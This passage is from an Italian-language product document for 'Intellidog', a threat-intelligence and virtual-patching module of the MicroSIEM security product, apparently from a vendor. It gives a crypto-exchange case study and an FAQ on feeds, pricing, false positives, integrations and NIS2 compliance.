└─ Intellidog virtual patching: €5.5k/anno (100x cheaper than replacement)

---

### **Caso 4: Cryptocurrency Exchange - High-Value Target**

**Scenario:**  
Crypto exchange startup, €50M AUM (Assets Under Management). Target di APT groups, ransomware gangs per high-value wallets. Necessità threat intelligence premium per early warning.

**Threat Landscape:**

Adversaries targeting crypto exchanges:
├─ Nation-state APT: Lazarus Group (North Korea)
├─ Ransomware: Conti, LockBit, BlackCat
├─ Crypto-specific malware: ClipBanker, CryptoStealer
└─ DDoS-for-ransom: Fancy Bear, Anonymous Sudan

Daily automated check

shodan_results = shodan_api.search(“crypto-exchange.com”)

if shodan_results[‘total’] > expected_exposure:
alert(“New service exposed! Shadow IT detected?”)
# Example: Developer deployed test instance, forgot firewall

**2. Dark Web Monitoring**

Monitored forums:
├─ RaidForums (shutdown, but monitoring successors)
├─ BreachForums
├─ XSS.is
└─ Telegram channels (APT, ransomware groups)

Keywords:
├─ “crypto-exchange.com”
├─ Employee emails: @crypto-exchange.com
├─ Wallet addresses (company hot wallets)
└─ Database dump mentions

**3. Targeted Threat Actor Tracking**

Lazarus Group indicators (Recorded Future feed):
├─ 47 C2 domains identified
├─ 23 malware families signatures
├─ 89 attacker IPs (rotating)
└─ TTPs: Spear-phishing, supply chain attacks, DeFi exploits

Proactive blocking:
├─ All 47 C2 domains → DNS blackhole
├─ All 89 IPs → Firedog ban
└─ Employees trained: Lazarus-specific phishing awareness

**Incident: Thwarted Attack**

**Week 1 - Reconnaissance (Detected by Intellidog)**

MISP alert: New Lazarus campaign targeting crypto exchanges

Intellidog action:
├─ Update IoC database with Lazarus indicators
├─ Proactive hunt: Search logs for any past Lazarus activity
└─ Result: Clean (no prior compromise)

**Week 2 - Spear-Phishing Attempt**

Email received: CFO receives “urgent compliance notice”
├─ Sender: compliance@crypto-regulatory-authority.com (spoofed)
├─ Attachment: PDF (actually .exe with PDF icon)
└─ Traditional email security: ❌ Passed (sophisticated phishing)

Intellidog detection:
├─ ✅ Domain crypto-regulatory-authority.com: Newly registered (2 days ago)
├─ ✅ Domain reputation: 0/100 (no legitimate history)
├─ ✅ Attachment hash: Match Lazarus malware family (MISP)
└─ Action: Email quarantined, CFO notified (security awareness reminder)

**Week 3 - Watering Hole Attack Detected**

Threat intel: Lazarus compromised popular crypto news site

Intellidog action:
├─ Block crypto-news-site.com at DNS level (temporary)
├─ Notify employees: “Site compromised, use alternative news sources”
├─ Monitor: Check if any employee visited before block (forensic analysis)
└─ Result: 0 infections (proactive blocking prevented exposure)

**Result:**

Attack outcome:
├─ Lazarus attempts: 3 (reconnaissance, phishing, watering hole)
├─ Successful compromises: 0 (all blocked by Intellidog)
├─ Potential loss: €50M (wallet theft if compromised)
├─ Actual loss: €0
└─ Intellidog ROI: 9,090x (€5.5k/anno prevented €50M loss)

Business impact:
├─ Customer confidence: Maintained (no breach disclosure)
├─ Regulatory compliance: Perfect record (no incident reporting)
├─ Insurance premium: Reduced 20% (strong security posture)
└─ Competitive advantage: Market differentiation (security-first exchange)

FAQ – Intellidog

Generale

Q: Intellidog è un tool separato o modulo di MicroSIEM?
A: Modulo premium di MicroSIEM, non tool standalone. Si attiva acquistando upgrade MicroSIEM + Intellidog.

Q: Posso comprare solo Intellidog senza MicroSIEM?
A: No, Intellidog richiede MicroSIEM Base attivo. È estensione complementare che aggiunge intelligence al monitoring esistente.

Q: Quanto costa?
A: €2.500/anno (in aggiunta a MicroSIEM Base €3.000).
Bundle: MicroSIEM + Intellidog = €5.500/anno (no discount, prezzi cumulativi).

Q: Serve Sentinel Core per usare Intellidog?
A: Non obbligatorio ma raccomandato:

• ✅ Funziona senza: Threat intel, exploit detection generica, virtual patching
• ⚠️ Limitato: Senza Sentinel Core non può correlare vulnerabilità specifiche CVE con exploit attivi
• 💡 Best practice: MicroSIEM + Intellidog + Sentinel Core = massimo valore

---

Threat Intelligence

Q: Quali feed sono inclusi nella licenza base?
A: Feed gratuiti inclusi:

• MISP (community feeds)
• AlienVault OTX
• AbuseIPDB
• Talos Intelligence (Cisco)

Feed premium opzionali (costo separato):

• Shodan API ($59/mese) – recommended
• VirusTotal API (da $500/anno)
• Recorded Future (da €30k/anno – enterprise only)

Q: Shodan è davvero necessario?
A: Dipende da use case:

Shodan utile per:

• Asset esposti Internet (web server, API)
• Cloud infrastructure (AWS, Azure, GCP)
• Organizzazioni con shadow IT risk
• Compliance che richiede attack surface management

Shodan meno critico per:

• Infrastructure completamente interna (no Internet exposure)
• Organizzazioni con inventario asset rigoroso
• Budget limitato (funziona senza, coverage ridotta ~70% vs ~95%)

Q: I miei dati vengono condivisi con threat intel provider?
A: NO, zero data sharing:

• Intellidog scarica IoC da feed esterni
• Intellidog non upload dati vostri (IP, vulnerabilità, log)
• Comunicazione one-way: pull only

Opt-in volontario: Puoi contribuire IoC anonimizzati a MISP community (default: disabled).

Q: Quanto sono aggiornati gli IoC?
A: Update frequency:

• MISP: Real-time (webhook) + sync ogni 4 ore
• AlienVault OTX: Ogni 1 ora
• AbuseIPDB: Real-time queries (API call quando necessario)
• Shodan: Daily updates

Zero-day response: Per CVE critical, sync manuale immediate disponibile (comando intellidog-sync --force-update).

---

Exploit Detection

Q: Quanti falsi positivi genera exploit detection?
A: False positive rate (dopo tuning iniziale):

• Low confidence (<30%): ~30% false positive (intended – catch tutto suspicious)
• Medium (30-70%): ~10% false positive
• High (70-90%): ~2% false positive
• Confirmed (90%+): <0.5% false positive

Tuning period: 2 settimane monitoring con feedback → false positive <5% overall.

Q: Intellidog può detection exploit mai visti (zero-day)?
A: Parzialmente:

• ✅ Behavioral detection: Syscall anomaly, process tree anomaly → può detection zero-day
• ⚠️ Signature-based: IoC matching richiede known signatures → miss zero-day finché IoC non pubblicato
• 💡 Hybrid approach: Combina entrambi → migliore detection rate

Best practice: Defense-in-depth – Intellidog + EDR (CrowdStrike, SentinelOne) per coverage completa.

Q: Come distingue tra vulnerability scanner legittimo e attacco?
A: Context-aware detection:

Vulnerability scanner (Nessus, OpenVAS):

• User-agent: Nessus scanner, OpenVAS
• Source IP: Internal network / known scanner IP
• Pattern: Sequential port scan (ordered)
• Timing: Scheduled (same time weekly)

Attacker:

• User-agent: Custom/spoofed
• Source IP: External / Tor exit node
• Pattern: Random port scan, targeting specific exploits
• Timing: Random, persistent

Configuration:

Whitelist legitimate scanners

whitelist:

• ip: 192.168.1.100
  description: “Nessus scanner”
  alert: false # Don’t alert on this IP

**Q: Intellidog monitora anche applicazioni custom (non solo vulnerabilità note)?**  
A: **Sì, behavioral analysis**:
- ✅ Process monitoring: Applicazione spawna shell = anomalo
- ✅ Network monitoring: Applicazione contatta IP non-whitelisted
- ✅ File monitoring: Applicazione crea file in location sospetta

**Limitation**: Senza CVE context (app custom non ha CVE), detection è behavioral-only (no IoC matching).

---

### **Virtual Patching**

**Q: Virtual patch è sicuro come patch vera?**  
A: **No, è mitigation temporanea**:

| Aspetto | Patch Ufficiale | Virtual Patch |
|---------|----------------|---------------|
| **Elimina vuln** | ✅ Sì | ❌ No (solo blocca exploit) |
| **Permanente** | ✅ Sì | ⚠️ Temporaneo |
| **Bypass risk** | ❌ No | ⚠️ Possibile (exploit variant) |
| **False positive** | ❌ No | ⚠️ Possibile (~1-2%) |
| **Deployment time** | ⚠️ Lento (ore/giorni) | ✅ Immediato (minuti) |

**Best practice**: Virtual patch come **bridge** mentre si attende/testa patch ufficiale.

**Q: Quanto tempo virtual patch rimane attivo?**  
A: **Fino a rimozione manuale** o automatic decommissioning:
- Manual removal: Quando patch ufficiale applicata
- Auto-decommissioning: Intellidog detect patch applicata (re-scan) → suggerisce rimozione virtual patch

**Lifecycle tipico**: 1-4 settimane (emergency mitigation → official patch → cleanup).

**Q: Virtual patch può bloccare traffico legittimo?**  
A: **Sì, risk mitigato con testing**:

**Testing mode** (obbligatorio):

Phase 1 (24-48h): ALERT ONLY
├─ Virtual patch rules log but don’t block
├─ Monitor false positive rate
└─ Tune rules se necessario

Phase 2: BLOCK MODE
├─ Activate blocking dopo testing successful
└─ Continuous monitoring false positives

If legit traffic blocked

intellidog-vpatch –whitelist-ip 192.168.1.50 –vpatch-id CVE-2024-1234

Or

intellidog-vpatch –disable CVE-2024-1234 # Temporarily disable while investigating

**Q: Posso creare virtual patch custom (non-CVE)?**  
A: **Sì, custom rule builder**:

**UI Example**:

Create Virtual Patch:
├─ Name: “Block SQL Injection in /api/search”
├─ Target: web-prod-01
├─ Rule Type: ModSecurity WAF
├─ Pattern: SQL injection keywords (UNION, SELECT, DROP, etc.)
├─ Action: Block + Log
└─ Testing: 48 hours alert-only

Result: Custom protection per applicazione proprietaria

---

### **Integrazione**

**Q: Intellidog comunica con Firedog?**  
A: **Sì, integration nativa** (con Integration Pack):
- Intellidog analizza PCAP da Firedog (exploit detection)
- Intellidog comanda Firedog per virtual patching (auto-block)
- Alert correlati (threat intel + firewall events)

**Q: Intellidog funziona con SIEM esterni (Splunk, ELK)?**  
A: **Sì, export capabilities**:
- Syslog forwarding (eventi Intellidog → SIEM)
- JSON export (IoC, detection results)
- API webhook (real-time event streaming)

**Use case**: Intellidog fa detection → invia event a Splunk → Splunk correla con altre security tools.

**Q: Posso integrare threat intel feed custom (interni)?**  
A: **Sì, import custom feeds**:

**Supported formats**:
- STIX 2.0/2.1 (Structured Threat Information Expression)
- CSV (IP, domain, hash, description)
- JSON (custom schema)

**Import methods**:
- Manual upload (UI)
- API REST (automation)
- Scheduled pull (Intellidog scarica da URL)

---

### **Performance & Scaling**

**Q: Intellidog rallenta MicroSIEM?**  
A: **Overhead minimo** (~10-15%):
- CPU: +10-15% durante IoC sync e correlation analysis
- RAM: +200-300MB per cache IoC (100k indicators)
- Disk: +50MB database threat intel locale
- Network: ~100MB/giorno sync IoC

**Optimization**: Analysis engine asincrono (non blocca monitoring normale).

**Q: Quanti IoC può gestire?**  
A: **Default capacity**:
- 100k IoC attivi in cache (performance optimal)
- 1M IoC storico in database (query più lente ma feasible)

**Enterprise deployment**: Database dedicato per IoC (PostgreSQL cluster) → scala a 10M+ IoC.

**Q: Intellidog funziona in ambienti air-gapped?**  
A: **Sì, con limitazioni**:

**Offline mode**:
- ✅ Behavioral analysis: Funziona (syscall, network anomaly detection)
- ❌ IoC matching: Limited (solo IoC cached, no real-time updates)
- ⚠️ Virtual patching: Funziona (rules generate locally)

**Sync workflow air-gapped**:

1. External system (con Internet) download IoC
2. Export IoC to USB drive (encrypted)
3. Import IoC in Intellidog air-gapped instance
4. Schedule: Weekly manual sync

Compliance & Reporting

Q: Intellidog aiuta con compliance NIS2?
A: Sì, specificamente:

• Art. 21(2)(e): Threat intelligence → Intellidog multi-source feeds ✅
• Art. 21(2)(a): Risk analysis → Exploit detection + risk scoring ✅
• Art. 21(2)(f): Incident handling → Virtual patching + timeline reconstruction ✅

Q: Report Intellidog sono audit-ready?
A: Sì:

• Timestamp NTP-synced (eventi accurati)
• Evidence trail (IoC sources, confidence scoring, correlation data)
• Export PDF/JSON per auditor
• Immutability (audit log append-only)

Auditor può verificare:

• “Quale threat intel fonte ha identificato questa minaccia?”
• “Quando è stato detection exploit?”
• “Quali azioni di remediation sono state prese?”

---

Licensing & Support

Q: Se ho già MicroSIEM, come aggiungo Intellidog?
A: Upgrade process:

1. Contact sales: upgrade@dognet.tech
2. License key aggiornata (payment difference €2.500/anno)
3. Install modulo: microsiem-addon install intellidog
4. Configuration wizard: Threat intel API keys, alert settings
5. Testing: 24h trial period (verify funziona correttamente)

Downtime: Zero (installazione a caldo, no reboot).

Use case: Troubleshooting false positives, maintenance.

Q: Supporto include threat intel feed setup?
A: Supporto standard (incluso):

• Guide documentazione setup feed gratuiti (MISP, OTX, AbuseIPDB)
• Troubleshooting connection issues

Supporto premium (+€2.000/anno):

• Hands-on setup feed premium (Shodan, VirusTotal)
• Custom feed integration (se avete feed proprietari)
• Tuning detection rules (ridurre false positives per vostro ambiente)

Q: Training disponibile?
A: Workshop dedicato (opzionale, €1.500):

• Day 1: Threat intelligence fundamentals, Intellidog features
• Day 2: Exploit detection tuning, virtual patching best practices, incident response workflow

Materiale: Slides, lab environment, certification

---